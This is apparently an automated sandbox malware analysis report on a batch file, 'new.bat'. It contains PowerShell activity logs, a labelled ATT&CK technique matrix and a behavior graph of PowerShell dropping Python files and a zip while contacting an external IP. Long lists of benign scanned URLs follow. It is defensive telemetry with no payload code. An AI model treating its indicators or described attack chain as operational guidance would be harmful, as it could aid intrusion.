Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
PowerShell
1
Scripting
11
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1500640 Sample: new.bat Startdate: 28/08/2024 Architecture: WINDOWS Score: 64 43 Malicious sample detected (through community Yara rule) 2->43 45 Found large BAT file 2->45 47 AI detected suspicious sample 2->47 8 cmd.exe 3 2 2->8         started        11 svchost.exe 1 1 2->11         started        process3 dnsIp4 49 Suspicious powershell command line found 8->49 14 powershell.exe 1002 8->14         started        18 powershell.exe 14 17 8->18         started        21 Acrobat.exe 75 8->21         started        23 2 other processes 8->23 41 127.0.0.1 unknown unknown 11->41 signatures5 process6 dnsIp7 29 C:\Users\user\Downloads\...\__init__.py, Python 14->29 dropped 31 C:\Users\user\Downloads\...\_in_process.py, Python 14->31 dropped 33 C:\Users\user\Downloads\...\__init__.py, Python 14->33 dropped 37 375 other files (none is malicious) 14->37 dropped 51 Loading BitLocker PowerShell Module 14->51 39 38.153.61.111 COGENT-174US United States 18->39 35 C:\Users\user\Downloads\DXJS.zip, Zip 18->35 dropped 25 AcroCEF.exe 108 21->25         started        file8 signatures9 process10 process11 27 AcroCEF.exe 4 25->27         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
new.bat11%ReversingLabsWin32.Trojan.Casdet
SourceDetectionScannerLabelLink
C:\Users\user\Downloads\Python\Python312\Lib\_aix_support.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_collections_abc.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_compression.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_markupbase.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_osx_support.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_py_abc.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_pydatetime.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_pyio.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_pylong.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_sitebuiltins.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_strptime.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_threading_local.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\_weakrefset.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\abc.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\aifc.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\argparse.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\ast.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\__main__.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\base_events.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\base_futures.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\base_subprocess.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\base_tasks.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\events.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\exceptions.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\format_helpers.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\futures.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\locks.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\log.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\mixins.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\proactor_events.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\protocols.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\queues.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\runners.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\selector_events.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\sslproto.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\staggered.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\streams.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\subprocess.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\taskgroups.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\tasks.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\threads.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\timeouts.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\transports.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\trsock.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\unix_events.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\windows_events.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\asyncio\windows_utils.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\base64.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\bdb.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\bisect.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\bz2.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\cProfile.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\calendar.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\cgi.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\cgitb.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\chunk.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\cmd.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\code.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\codecs.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\collections\__init__.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\collections\abc.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\colorsys.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\compileall.py0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\Lib\concurrent\futures\__init__.py0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm0%URL Reputationsafe
https://docs.python.org/3/glossary.html0%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/c-api/memoryview.rst0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=52370%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=337200%Avira URL Cloudsafe
http://freshmeat.net/releases/52719/&#39;0%Avira URL Cloudsafe
https://peps.python.org/pep-0508/#environment-markers0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=74180%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/c-api/utilities.rst0%Avira URL Cloudsafe
https://www.barebones.com/products/bbedit/index.html0%Avira URL Cloudsafe
https://peps.python.org/pep-0528/0%Avira URL Cloudsafe
http://www.iana.org/time-zones/repository/tz-link.html0%URL Reputationsafe
https://macvim.org0%Avira URL Cloudsafe
http://bugs.python.org/issue6857.0%Avira URL Cloudsafe
https://datatracker.ietf.org/doc/html/rfc4122.html0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=43840%Avira URL Cloudsafe
https://cython.org/0%Avira URL Cloudsafe
https://docs.python.org/3/faq/design.html0%Avira URL Cloudsafe
https://github.com/python/cpython/tree/3.12/Modules0%Avira URL Cloudsafe
https://docs.python.org/3/c-api/long.html0%Avira URL Cloudsafe
https://docs.python.org/3/library/windows.html0%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/howto/isolating-extensions.rst0%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/howto/instrumentation.rst0%Avira URL Cloudsafe
https://wiki.python.org/moin/IntegratedDevelopmentEnvironments0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=73010%Avira URL Cloudsafe
https://docs.python.org/3/whatsnew/2.3.html0%Avira URL Cloudsafe
https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html0%Avira URL Cloudsafe
https://docs.python.org/3/genindex-S.html0%Avira URL Cloudsafe
http://speleotrove.com/decimal/decarith.html0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16961990%Avira URL Cloudsafe
https://peps.python.org/pep-3155/0%Avira URL Cloudsafe
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode0%Avira URL Cloudsafe
https://github.com/python/typing/issues/5080%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=98400%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=99620%Avira URL Cloudsafe
https://osl.cs.illinois.edu/media/papers/karmani-2009-barrier_synchronization_pattern.pdf0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=108270%Avira URL Cloudsafe
https://peps.python.org/pep-0526/0%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/library/winsound.rst0%Avira URL Cloudsafe
https://peps.python.org/pep-0308/0%Avira URL Cloudsafe
https://peps.python.org/pep-0538/0%Avira URL Cloudsafe
https://github.com/python/cpython/tree/3.12/Lib/zipapp.py0%Avira URL Cloudsafe
https://github.com/python/cpython/issues/86361.0%Avira URL Cloudsafe
https://docs.python.org/3/library/tokenize.html0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/whatsnew/3.2.rst0%Avira URL Cloudsafe
https://peps.python.org/pep-0634/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=42850%Avira URL Cloudsafe
https://www.zlib....0%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/tutorial/introduction.rst0%Avira URL Cloudsafe
https://pyinstaller.org/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=87770%Avira URL Cloudsafe
https://docs.python.org/2.2/lib/lib.html0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=84130%Avira URL Cloudsafe
https://g.live.com/odclientsettings/Prod-C:0%Avira URL Cloudsafe
https://github.com/python/cpython/tree/3.12/Lib/zipfile/0%Avira URL Cloudsafe
https://toga.readthedocs.io0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=98620%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/library/zlib.rst0%Avira URL Cloudsafe
https://github.com/MagicStack/uvloop/tree/v0.16.00%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=64720%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17728330%Avira URL Cloudsafe
https://datatracker.ietf.org/doc/html/rfc2104.html0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=97570%Avira URL Cloudsafe
https://macromates.com0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=108890%Avira URL Cloudsafe
https://discuss.python.org/c/core-dev/c-api/300%Avira URL Cloudsafe
https://docs.python.org/3/library/re.html#re.sub0%Avira URL Cloudsafe
https://pyyaml.org/0%Avira URL Cloudsafe
https://docs.python.org/3/library/xml.sax.utils.html0%Avira URL Cloudsafe
https://docs.python.org/3/library/weakref.html0%Avira URL Cloudsafe
http://lxr.mozilla.org/mozilla-release/source/netwerk/protocol/http/nsHttpResponseHead.cpp#3970%Avira URL Cloudsafe
https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.py0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=85400%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/library/windows.rst0%Avira URL Cloudsafe
https://docs.python.org/3/c-api/typehints.html0%Avira URL Cloudsafe
http://svn.red-bean.com/bob/macholib/trunk/macholib/0%Avira URL Cloudsafe
https://peps.python.org/pep-0525/0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=61370%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/tutorial/classes.rst0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=51500%Avira URL Cloudsafe
https://peps.python.org/pep-0307/0%Avira URL Cloudsafe
https://www2.cs.arizona.edu/icon/docs/ipd266.htm0%Avira URL Cloudsafe
https://docs.python.org/3/howto/instrumentation.html0%Avira URL Cloudsafe
https://www.python.org/dev/peps/pep-0566/#json-compatible-metadata0%Avira URL Cloudsafe
https://setuptools.pypa.io/en/latest/references/0%Avira URL Cloudsafe
https://freedesktop.org/wiki/Software/xdg-user-dirs/.z0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=41950%Avira URL Cloudsafe
https://www.tcl.tk0%Avira URL Cloudsafe
https://pypi.org/project/zipp0%Avira URL Cloudsafe
https://peps.python.org/pep-3151/0%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/c-api/capsule.rst0%Avira URL Cloudsafe
https://github.com/python/cpython/blob/main/Doc/tutorial/errors.rst0%Avira URL Cloudsafe
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=74610%Avira URL Cloudsafe
http://www.oreillynet.com/meerkat/xml-rpc/server.php&#39;0%Avira URL Cloudsafe
https://pypi.org/project/pyserial/0%Avira URL Cloudsafe
https://developer.mozilla.org/en-US/docs/Web/HTTP/Caching_FAQ0%Avira URL Cloudsafe
https://idlefork.sourceforge.net0%Avira URL Cloudsafe
https://peps.python.org/pep-3333/0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=52373.1.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/glossary.htmlglossary.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://www.barebones.com/products/bbedit/index.htmlmac.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=74183.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/c-api/utilities.rstutilities.html.16.drfalse
  • Avira URL Cloud: safe
unknown
http://freshmeat.net/releases/52719/&#39;2.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/c-api/memoryview.rstmemoryview.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33720intro.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0528/init_config.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0508/#environment-markersinstallation_report.py.16.drfalse
  • Avira URL Cloud: safe
unknown
http://bugs.python.org/issue6857._pydecimal.py.16.drfalse
  • Avira URL Cloud: safe
unknown
https://datatracker.ietf.org/doc/html/rfc4122.htmluuid.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://macvim.orgmac.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=43843.1.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/c-api/long.htmllong.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/tree/3.12/Moduleslibrary.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://cython.org/design.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/faq/design.htmldesign.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/library/windows.htmlwindows.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/howto/isolating-extensions.rstisolating-extensions.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=73013.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/howto/instrumentation.rstinstrumentation.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.htmlunix.cpython-312.pyc.16.drfalse
  • Avira URL Cloud: safe
unknown
https://wiki.python.org/moin/IntegratedDevelopmentEnvironmentseditors.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/genindex-S.htmlgenindex-S.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/whatsnew/2.3.html2.3.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16961993.1.html.16.drfalse
  • Avira URL Cloud: safe
unknown
http://speleotrove.com/decimal/decarith.html_pydecimal.py.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-3155/glossary.html.16.drfalse
  • Avira URL Cloud: safe
unknown
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodetransports.cpython-312.pyc.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=98403.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=99623.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/typing/issues/508dataclasses.py.16.drfalse
  • Avira URL Cloud: safe
unknown
https://osl.cs.illinois.edu/media/papers/karmani-2009-barrier_synchronization_pattern.pdf3.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/library/winsound.rstwinsound.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=108273.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/tree/3.12/Lib/zipapp.pyzipapp.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0526/glossary.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0308/expressions.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0538/init_config.html.16.dr, cmdline.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/3/library/tokenize.htmltokenize.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/issues/86361.typing.cpython-312.pyc.16.drfalse
  • Avira URL Cloud: safe
unknown
http://crl.ver)svchost.exe, 00000007.00000002.2679153943.000001FB4B800000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html_pydatetime.py.16.drfalse
  • URL Reputation: safe
unknown
https://github.com/python/cpython/blob/main/Doc/whatsnew/3.2.rst3.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://peps.python.org/pep-0634/typeobj.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=42853.1.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/tutorial/introduction.rstintroduction.html0.16.drfalse
  • Avira URL Cloud: safe
unknown
https://www.zlib....zlib.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://pyinstaller.org/mac.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=87773.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://docs.python.org/2.2/lib/lib.html2.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=84133.2.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://g.live.com/odclientsettings/Prod-C:svchost.exe, 00000007.00000003.1471535168.000001FB4B6A3000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://toga.readthedocs.iomac.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/tree/3.12/Lib/zipfile/zipfile.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/python/cpython/blob/main/Doc/library/zlib.rstzlib.html.16.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/MagicStack/uvloop/tree/v0.16.0sslproto.py.16.drfalse
  • Avira URL Cloud: safe
unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm_pydatetime.py.16.drfalse
  • URL Reputation: safe
unknown
